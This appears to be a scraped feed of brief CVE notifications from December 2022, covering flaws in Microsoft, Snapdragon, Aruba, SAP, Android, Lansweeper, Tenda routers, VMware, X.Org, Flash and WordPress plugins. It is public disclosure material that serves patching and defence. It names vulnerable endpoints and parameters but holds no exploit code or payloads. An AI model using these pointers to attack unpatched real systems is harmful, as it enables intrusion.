🚨 CVE-2022-41115Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:39 |
🚨 CVE-2022-41121Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-44671, CVE-2022-44680, CVE-2022-44697.🎖@cveNotify |
|
| 2022-12-15 23:29:38 |
🚨 CVE-2022-26806Microsoft Office Graphics Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26804, CVE-2022-26805, CVE-2022-44692, CVE-2022-47211, CVE-2022-47212, CVE-2022-47213.🎖@cveNotify |
|
| 2022-12-15 23:29:37 |
🚨 CVE-2022-26805Microsoft Office Graphics Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26804, CVE-2022-26806, CVE-2022-44692, CVE-2022-47211, CVE-2022-47212, CVE-2022-47213.🎖@cveNotify |
|
| 2022-12-15 22:29:37 |
🚨 CVE-2022-23473Tuleap is an Open Source Suite to improve management of software developments and collaboration. In versions prior to 14.2.99.148, Authorizations are not properly verified when accessing MediaWiki standalone resources. Users with read only permissions for pages are able to also edit them. This only affects the MediaWiki standalone plugin. This issue is patched in versions Tuleap Community Edition 14.2.99.148, Tuleap Enterprise Edition 14.2-5, and Tuleap Enterprise Edition 14.1-6.🎖@cveNotify |
|
| 2022-12-15 22:29:36 |
🚨 CVE-2020-21219Cross Site Scripting (XSS) vulnerability in Netgate pf Sense 2.4.4-Release-p3 and Netgate ACME package 0.6.3 allows remote attackers to to run arbitrary code via the RootFolder field to acme_certificate_edit.php page of the ACME package.🎖@cveNotify |
|
| 2022-12-15 22:29:35 |
🚨 CVE-2021-4226RSFirewall tries to identify the original IP address by looking at different HTTP headers. A bypass is possible due to the way it is implemented.🎖@cveNotify |
|
| 2022-12-15 20:29:47 |
🚨 CVE-2022-33238Transient DOS due to loop with unreachable exit condition in WLAN while processing an incoming FTM frames. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking🎖@cveNotify |
|
| 2022-12-15 20:29:43 |
🚨 CVE-2022-33235Information disclosure due to buffer over-read in WLAN firmware while parsing security context info attributes. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking🎖@cveNotify |
|
| 2022-12-15 20:29:40 |
🚨 CVE-2022-33268Information disclosure due to buffer over-read in Bluetooth HOST while pairing and connecting A2DP. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables🎖@cveNotify |
|
| 2022-12-15 18:29:58 |
🚨 CVE-2022-25673Denial of service in MODEM due to reachable assertion while processing configuration from network in Snapdragon Mobile🎖@cveNotify |
|
| 2022-12-15 18:29:57 |
🚨 CVE-2022-25672Denial of service in MODEM due to reachable assertion while processing SIB1 with invalid Bandwidth in Snapdragon Mobile🎖@cveNotify |
|
| 2022-12-15 18:29:56 |
🚨 CVE-2022-25698Memory corruption in SPI buses due to improper input validation while reading address configuration from spi buses in Snapdragon Mobile, Snapdragon Wearables🎖@cveNotify |
|
| 2022-12-15 18:29:52 |
🚨 CVE-2022-25702Denial of service in modem due to reachable assertion while processing reconfiguration message in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables🎖@cveNotify |
|
| 2022-12-15 18:29:51 |
🚨 CVE-2022-25692Denial of service in Modem due to reachable assertion while processing the common config procedure in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables🎖@cveNotify |
|
| 2022-12-15 18:29:50 |
🚨 CVE-2022-43541Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-15 18:29:46 |
🚨 CVE-2022-4312A cleartext storage of sensitive information vulnerability exists in PcVue versions 8.10 through 15.2.3. This could allow an unauthorized user with access the email and short messaging service (SMS) accounts configuration files to discover the associated simple mail transfer protocol (SMTP) account credentials and the SIM card PIN code. Successful exploitation of this vulnerability could allow an unauthorized user access to the underlying email account and SIM card.🎖@cveNotify |
|
| 2022-12-15 18:29:45 |
🚨 CVE-2022-43518An authenticated path traversal vulnerability exists in the Aruba EdgeConnect Enterprise web interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files on the underlying operating system, including sensitive system files in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-15 18:29:44 |
🚨 CVE-2022-41261SAP Solution Manager (Diagnostic Agent) - version 7.20, allows an authenticated attacker on Windows system to access a file containing sensitive data which can be used to access a configuration file which contains credentials to access other system files. Successful exploitation can make the attacker access files and systems for which he/she is not authorized.🎖@cveNotify |
|
| 2022-12-15 18:29:43 |
🚨 CVE-2022-41262Due to insufficient input validation, SAP NetWeaver AS Java (HTTP Provider Service) - version 7.50, allows an unauthenticated attacker to inject a script into a web request header. On successful exploitation, an attacker can view or modify information causing a limited impact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2022-12-15 18:29:40 |
🚨 CVE-2022-41263Due to a missing authentication check, SAP Business Objects Business Intelligence Platform (Web Intelligence) - versions 420, 430, allows an authenticated non-administrator attacker to modify the data source information for a document that is otherwise restricted. On successful exploitation, the attacker can modify information causing a limited impact on the integrity of the application.🎖@cveNotify |
|
| 2022-12-15 18:29:39 |
🚨 CVE-2022-38395HP Support Assistant uses HP Performance Tune-up as a diagnostic tool. HP Support Assistant uses Fusion to launch HP Performance Tune-up. It is possible for an attacker to exploit the DLL hijacking vulnerability and elevate privileges when Fusion launches the HP Performance Tune-up.🎖@cveNotify |
|
| 2022-12-15 18:29:38 |
🚨 CVE-2022-41266Due to a lack of proper input validation, SAP Commerce Webservices 2.0 (Swagger UI) - versions 1905, 2005, 2105, 2011, 2205, allows malicious inputs from untrusted sources, which can be leveraged by an attacker to execute a DOM Cross-Site Scripting (XSS) attack. As a result, an attacker may be able to steal user tokens and achieve a full account takeover including access to administrative tools in SAP Commerce.🎖@cveNotify |
|
| 2022-12-15 16:29:59 |
🚨 CVE-2022-20501In onCreate of EnableAccountPreferenceActivity.java, there is a possible way to mislead the user into enabling a malicious phone account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-246933359🎖@cveNotify |
|
| 2022-12-15 16:29:58 |
🚨 CVE-2022-20611In deletePackageVersionedInternal of DeletePackageHelper.java, there is a possible way to bypass carrier restrictions due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242996180🎖@cveNotify |
|
| 2022-12-15 16:29:57 |
🚨 CVE-2022-20500In loadFromXml of ShortcutPackage.java, there is a possible crash on boot due to an uncaught exception. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-246540168🎖@cveNotify |
|
| 2022-12-15 16:29:56 |
🚨 CVE-2022-37901Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-15 16:29:52 |
🚨 CVE-2022-37898Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-15 16:29:51 |
🚨 CVE-2022-4314Improper Privilege Management in GitHub repository ikus060/rdiffweb prior to 2.5.2.🎖@cveNotify |
|
| 2022-12-15 16:29:50 |
🚨 CVE-2022-4097The All-In-One Security (AIOS) WordPress plugin before 5.0.8 is susceptible to IP Spoofing attacks, which can lead to bypassed security features (like IP blocks, rate limiting, brute force protection, and more).🎖@cveNotify |
|
| 2022-12-15 16:29:49 |
🚨 CVE-2022-4016The Booster for WooCommerce WordPress plugin before 5.6.7, Booster Plus for WooCommerce WordPress plugin before 5.6.6, Booster Elite for WooCommerce WordPress plugin before 1.1.8 does not properly check for CSRF when creating and deleting Customer roles, allowing attackers to make logged admins create and delete arbitrary custom roles via CSRF attacks🎖@cveNotify |
|
| 2022-12-15 16:29:45 |
🚨 CVE-2022-37899Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-15 16:29:44 |
🚨 CVE-2022-45275An arbitrary file upload vulnerability in /queuing/admin/ajax.php?action=save_settings of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.🎖@cveNotify |
|
| 2022-12-15 16:29:43 |
🚨 CVE-2022-46903Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Stored XSS.🎖@cveNotify |
|
| 2022-12-15 16:29:39 |
🚨 CVE-2022-46904Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Self-XSS.🎖@cveNotify |
|
| 2022-12-15 16:29:38 |
🚨 CVE-2022-46906Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Reflected XSS.🎖@cveNotify |
|
| 2022-12-15 16:29:37 |
🚨 CVE-2022-37905Vulnerabilities in ArubaOS running on 7xxx series controllers exist that allows an attacker to execute arbitrary code during the boot sequence. Successful exploitation could allow an attacker to achieve permanent modification of the underlying operating system.🎖@cveNotify |
|
| 2022-12-15 16:29:36 |
🚨 CVE-2022-46768Arbitrary file read vulnerability exists in Zabbix Web Service Report Generation, which listens on the port 10053. The service does not have proper validation for URL parameters before reading the files.🎖@cveNotify |
|
| 2022-12-15 12:29:44 |
🚨 CVE-2022-27498A directory traversal vulnerability exists in the TicketTemplateActions.aspx GetTemplateAttachment functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:42 |
🚨 CVE-2022-28703A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:41 |
🚨 CVE-2022-29511A directory traversal vulnerability exists in the KnowledgebasePageActions.aspx ImportArticles functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:39 |
🚨 CVE-2022-29517A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:38 |
🚨 CVE-2022-32573A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:37 |
🚨 CVE-2022-32763A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-15 12:29:36 |
🚨 CVE-2022-46768Arbitrary file read vulnerability exists in Zabbix Web Service Report Generation, which listens on the port 10053. The service does not have proper validation for URL parameters before reading the files.🎖@cveNotify |
|
| 2022-12-15 07:29:37 |
🚨 CVE-2022-20240In sOpAllowSystemRestrictionBypass of AppOpsManager.java, there is a possible leak of location information due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12LAndroid ID: A-231496105🎖@cveNotify |
|
| 2022-12-15 07:29:36 |
🚨 CVE-2021-39617In the user interface buttons of PermissionController, there is a possible way to bypass permissions dialogs due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12LAndroid ID: A-175190844🎖@cveNotify |
|
| 2022-12-15 07:29:35 |
🚨 CVE-2022-4502Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.2.🎖@cveNotify |
|
| 2022-12-15 00:29:55 |
🚨 CVE-2022-3106An issue was discovered in the Linux kernel through 5.16-rc6. ef100_update_stats in drivers/net/ethernet/sfc/ef100_nic.c lacks check of the return value of kmalloc().🎖@cveNotify |
|
| 2022-12-15 00:29:54 |
🚨 CVE-2022-3107An issue was discovered in the Linux kernel through 5.16-rc6. netvsc_get_ethtool_stats in drivers/net/hyperv/netvsc_drv.c lacks check of the return value of kvmalloc_array() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-15 00:29:53 |
🚨 CVE-2022-3110An issue was discovered in the Linux kernel through 5.16-rc6. _rtw_init_xmit_priv in drivers/staging/r8188eu/core/rtw_xmit.c lacks check of the return value of rtw_alloc_hwxmits() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-15 00:29:49 |
🚨 CVE-2022-3112An issue was discovered in the Linux kernel through 5.16-rc6. amvdec_set_canvases in drivers/staging/media/meson/vdec/vdec_helpers.c lacks check of the return value of kzalloc() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-15 00:29:48 |
🚨 CVE-2022-3114An issue was discovered in the Linux kernel through 5.16-rc6. imx_register_uart_clocks in drivers/clk/imx/clk.c lacks check of the return value of kcalloc() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-15 00:29:47 |
🚨 CVE-2022-3115An issue was discovered in the Linux kernel through 5.16-rc6. malidp_crtc_reset in drivers/gpu/drm/arm/malidp_crtc.c lacks check of the return value of kzalloc() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-15 00:29:43 |
🚨 CVE-2022-46341A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIPassiveUngrab request accesses out-of-bounds memory when invoked with a high keycode or button code. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-15 00:29:42 |
🚨 CVE-2022-46343A vulnerability was found in X.Org. This security flaw occurs because the handler for the ScreenSaverSetAttributes request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-15 00:29:41 |
🚨 CVE-2022-46344A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIChangeProperty request has a length-validation issues, resulting in out-of-bounds memory reads and potential information disclosure. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-15 00:29:37 |
🚨 CVE-2022-47407An issue was discovered in the fp_masterquiz (aka Master-Quiz) extension before 2.2.1, and 3.x before 3.5.1, for TYPO3. An attacker can continue the quiz of a different user. In doing so, the attacker can view that user's answers and modify those answers.🎖@cveNotify |
|
| 2022-12-15 00:29:36 |
🚨 CVE-2022-47409An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Attackers can unsubscribe everyone via a series of modified subscription UIDs in deleteAction operations.🎖@cveNotify |
|
| 2022-12-15 00:29:35 |
🚨 CVE-2022-47410An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Data about subscribers may be obtained via createAction operations.🎖@cveNotify |
|
| 2022-12-14 21:30:04 |
🚨 CVE-2022-3883The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 7.24 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org🎖@cveNotify |
|
| 2022-12-14 21:30:03 |
🚨 CVE-2022-3485In IFM Moneo Appliance with version up to 1.9.3 an unauthenticated remote attacker can reset the administrator password by only supplying the serial number.🎖@cveNotify |
|
| 2022-12-14 21:30:01 |
🚨 CVE-2022-46688A cross-site request forgery (CSRF) vulnerability in Jenkins Sonar Gerrit Plugin 377.v8f3808963dc5 and earlier allows attackers to have Jenkins connect to Gerrit servers (previously configured by Jenkins administrators) using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2022-12-14 21:30:00 |
🚨 CVE-2022-45997Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.🎖@cveNotify |
|
| 2022-12-14 21:29:59 |
🚨 CVE-2022-3641Elevation of privilege in the Azure SQL Data Source in Devolutions Remote Desktop Manager 2022.3.13 to 2022.3.24 allows an authenticated user to spoof a privileged account.🎖@cveNotify |
|
| 2022-12-14 21:29:57 |
🚨 CVE-2022-23741An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed a scoped user-to-server token to escalate to full admin/owner privileges. An attacker would require an account with admin access to install a malicious GitHub App. This vulnerability was fixed in versions 3.3.17, 3.4.12, 3.5.9, and 3.6.5. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2022-12-14 21:29:56 |
🚨 CVE-2022-31700VMware Workspace ONE Access and Identity Manager contain an authenticated remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.2.🎖@cveNotify |
|
| 2022-12-14 21:29:55 |
🚨 CVE-2022-31701VMware Workspace ONE Access and Identity Manager contain a broken authentication vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.🎖@cveNotify |
|
| 2022-12-14 21:29:54 |
🚨 CVE-2022-31702vRealize Network Insight (vRNI) contains a command injection vulnerability present in the vRNI REST API. A malicious actor with network access to the vRNI REST API can execute commands without authentication.🎖@cveNotify |
|
| 2022-12-14 21:29:52 |
🚨 CVE-2022-31703vRealize Network Insight (vRNI) directory traversal vulnerability in vRNI REST API. A malicious actor with network access to the vRNI REST API can read arbitrary files from the server.🎖@cveNotify |
|
| 2022-12-14 21:29:51 |
🚨 CVE-2022-31705VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.🎖@cveNotify |
|
| 2022-12-14 21:29:49 |
🚨 CVE-2022-45977Tenda AX12 V22.03.01.21_CN was found to have a command injection vulnerability via /goform/setMacFilterCfg function.🎖@cveNotify |
|
| 2022-12-14 21:29:48 |
🚨 CVE-2022-45979Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set .🎖@cveNotify |
|
| 2022-12-14 21:29:46 |
🚨 CVE-2022-45980Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet .🎖@cveNotify |
|
| 2022-12-14 21:29:44 |
🚨 CVE-2022-45996Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output.🎖@cveNotify |
|
| 2022-12-14 21:29:43 |
🚨 CVE-2016-0997Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0998, CVE-2016-0999, and CVE-2016-1000.🎖@cveNotify |
|
| 2022-12-14 21:29:42 |
🚨 CVE-2016-0998Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0997, CVE-2016-0999, and CVE-2016-1000.🎖@cveNotify |
|
| 2022-12-14 21:29:40 |
🚨 CVE-2019-11044In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 on Windows, PHP link() function accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.🎖@cveNotify |
|
| 2022-12-14 21:29:39 |
🚨 CVE-2016-1000Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0997, CVE-2016-0998, and CVE-2016-0999.🎖@cveNotify |
|
| 2022-12-14 21:29:38 |
🚨 CVE-2016-1001Heap-based buffer overflow in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors.🎖@cveNotify |
|
| 2022-12-14 20:30:18 |
🚨 CVE-2022-37928Insufficient Verification of Data Authenticity vulnerability in Hewlett Packard Enterprise HPE Nimble Storage Hybrid Flash Arrays and Nimble Storage Secondary Flash Arrays.🎖@cveNotify |
|
| 2022-12-14 20:30:16 |
🚨 CVE-2022-23520rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, there is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer due to an incomplete fix of CVE-2022-32209. Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both "select" and "style" elements. Code is only impacted if allowed tags are being overridden. This issue is patched in version 1.4.4. All users overriding the allowed tags to include both "select" and "style" should either upgrade or use this workaround: Remove either "select" or "style" from the overridden allowed tags. NOTE: Code is _not_ impacted if allowed tags are overridden using either the :tags option to the Action View helper method sanitize or the :tags option to the instance method SafeListSanitizer#sanitize.🎖@cveNotify |
|
| 2022-12-14 20:30:14 |
🚨 CVE-2022-23527mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server. Versions prior to 2.4.12.2 are vulnerable to Open Redirect. When providing a logout parameter to the redirect URI, the existing code in oidc_validate_redirect_url() does not properly check for URLs that start with /\t, leading to an open redirect. This issue has been patched in version 2.4.12.2. Users unable to upgrade can mitigate the issue by configuring mod_auth_openidc to only allow redirection when the destination matches a given regular expression with OIDCRedirectURLsAllowed.🎖@cveNotify |
|
| 2022-12-14 20:30:11 |
🚨 CVE-2022-44910Binbloom 2.0 was discovered to contain a heap buffer overflow via the read_pointer function at /binbloom-master/src/helpers.c.🎖@cveNotify |
|
| 2022-12-14 20:30:09 |
🚨 CVE-2022-46071There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.🎖@cveNotify |
|
| 2022-12-14 20:30:07 |
🚨 CVE-2022-46072Helmet Store Showroom v1.0 vulnerable to unauthenticated SQL Injection.🎖@cveNotify |
|
| 2022-12-14 20:30:06 |
🚨 CVE-2022-46255An improper limitation of a pathname to a restricted directory vulnerability was identified in GitHub Enterprise Server that enabled remote code execution. A check was added within Pages to ensure the working directory is clean before unpacking new content to prevent an arbitrary file overwrite bug. This vulnerability affected only version 3.7.0 of GitHub Enterprise Server and was fixed in version 3.7.1. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2022-12-14 20:30:05 |
🚨 CVE-2022-46256A path traversal vulnerability was identified in GitHub Enterprise Server that allowed remote code execution when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the instance. This vulnerability was fixed in versions 3.3.17, 3.4.12, 3.5.9, 3.6.5 and 3.7.2. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2022-12-14 20:30:03 |
🚨 CVE-2022-46443mesinkasir Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.🎖@cveNotify |
|
| 2022-12-14 20:30:01 |
🚨 CVE-2022-35295In SAP Host Agent (SAPOSCOL) - version 7.22, an attacker may use files created by saposcol to escalate privileges for themselves.🎖@cveNotify |
|
| 2022-12-14 20:29:57 |
🚨 CVE-2016-0995Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0991, CVE-2016-0994, CVE-2016-0996, CVE-2016-0997, CVE-2016-0998, CVE-2016-0999, and CVE-2016-1000.🎖@cveNotify |
|
| 2022-12-14 20:29:56 |
🚨 CVE-2022-25837Bluetooth® Pairing in Bluetooth Core Specification v1.0B through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when at least one device supports BR/EDR Secure Connections pairing and the other BR/EDR Legacy PIN code pairing if the MITM negotiates BR/EDR Secure Simple Pairing in Secure Connections mode using the Passkey association model with the pairing Initiator and BR/EDR Legacy PIN code pairing with the pairing Responder and brute forces the Passkey entered by the user into the Responder as a 6-digit PIN code. The MITM attacker can use the identified PIN code value as the Passkey value to complete authentication with the Initiator via Bluetooth pairing method confusion.🎖@cveNotify |
|
| 2022-12-14 20:29:55 |
🚨 CVE-2019-4231IBM Cognos Analytics 11.0 and 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 159356.🎖@cveNotify |
|
| 2022-12-14 20:29:54 |
🚨 CVE-2022-25836Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when the MITM negotiates Legacy Passkey Pairing with the pairing Initiator and Secure Connections Passkey Pairing with the pairing Responder and brute forces the Passkey entered by the user into the Initiator. The MITM attacker can use the identified Passkey value to complete authentication with the Responder via Bluetooth pairing method confusion.🎖@cveNotify |
|
| 2022-12-14 20:29:53 |
🚨 CVE-2016-1002Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0960, CVE-2016-0961, CVE-2016-0962, CVE-2016-0986, CVE-2016-0989, CVE-2016-0992, and CVE-2016-1005.🎖@cveNotify |
|
| 2022-12-14 20:29:49 |
🚨 CVE-2019-17571Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.🎖@cveNotify |
|
| 2022-12-14 20:29:48 |
🚨 CVE-2021-42192Konga v0.14.9 is affected by an incorrect access control vulnerability where a specially crafted request can lead to privilege escalation.🎖@cveNotify |
|
| 2022-12-14 20:29:47 |
🚨 CVE-2021-25086The Advanced Page Visit Counter WordPress plugin before 6.1.2 does not sanitise and escape some input before outputting it in an admin dashboard page, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admins viewing it🎖@cveNotify |
|
